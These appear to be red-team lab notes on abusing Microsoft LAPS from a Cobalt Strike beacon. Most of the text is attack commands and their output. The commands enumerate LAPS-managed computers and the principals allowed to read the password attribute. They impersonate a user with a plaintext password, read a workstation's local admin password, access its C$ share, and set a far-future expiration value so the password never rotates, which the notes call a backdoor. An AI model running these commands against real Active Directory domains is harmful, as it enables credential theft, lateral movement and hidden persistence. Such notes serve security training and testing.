LAPS
# List computers whose ms-Mcs-AdmPwdExpirationTime attribute is set (non-null), i.e. computers managed by LAPS
beacon> powershell Get-DomainObject -SearchBase "LDAP://DC=dev,DC=cyberbotic,DC=io" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
# Confirm the LAPS client-side extension (AdmPwd.dll) is installed on a given computer
beacon> ls C:\Program Files\LAPS\CSE
Size Type Last Modified Name
---- ---- ------------- ----
145kb fil 09/22/2016 08:02:08 AdmPwd.dll
# Or, if the LAPS PowerShell cmdlets are installed locally
beacon> powershell Get-Command *AdmPwd*
beacon> powershell Find-AdmPwdExtendedRights -Identity Workstations | fl
beacon> powershell Get-AdmPwdPassword -ComputerName wkstn-2 | fl
# Search for the GPO that deploys LAPS (name contains "laps")
beacon> powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl
# Download the GPO's Registry.pol from SYSVOL
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol
# Parse the policy file to read the LAPS settings it applies
# https://github.com/PowerShell/GPRegistryPolicyParser
PS C:\Users\Administrator\Desktop> Parse-PolFile .\Registry.pol
# Find principals that have ReadProperty rights on the ms-Mcs-AdmPwd attribute (they can read the LAPS password)
powershell Get-DomainObjectAcl -SearchBase "LDAP://OU=Workstations,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -like "*ReadProperty*" } | select ObjectDN, SecurityIdentifier
ObjectDN SecurityIdentifier
-------- ------------------
OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-3263068140-2042698922-2891547269-1125
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-3263068140-2042698922-2891547269-1125
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-3263068140-2042698922-2891547269-1125
beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1125
DEV\1st Line Support
beacon> make_token DEV\jking Purpl3Drag0n
beacon> powershell Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd
ms-mcs-admpwd
-------------
P0OPwa4R64AkbJ
beacon> make_token .\lapsadmin P0OPwa4R64AkbJ
beacon> ls \\wkstn-2\c$
Persistence & Backdoor (setting ms-Mcs-AdmPwdExpirationTime to a far-future value stops the password from rotating; an expiration time far beyond the policy's maximum age is a detection point)
beacon> powershell Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
beacon> powershell Get-DomainObject -Identity wkstn-2 -Properties ms-mcs-admpwdexpirationtime